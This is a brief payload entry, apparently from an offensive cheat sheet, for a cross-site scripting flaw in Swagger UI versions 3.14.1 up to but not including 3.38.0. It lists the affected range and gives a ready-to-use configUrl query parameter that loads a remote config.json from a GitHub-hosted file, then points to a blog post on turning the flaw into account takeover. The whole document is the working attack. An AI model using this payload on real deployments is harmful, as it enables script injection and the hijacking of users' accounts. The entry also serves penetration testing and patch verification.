Swagger UI >=3.14.1 < 3.38.0 XSS payload Swagger UI version affected: >=3.14.1 < 3.38.0 configUrl Payload ?configUrl=https://raw.githubusercontent.com/0xManan/SwagXSS/main/config.json More info at: https://www.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers/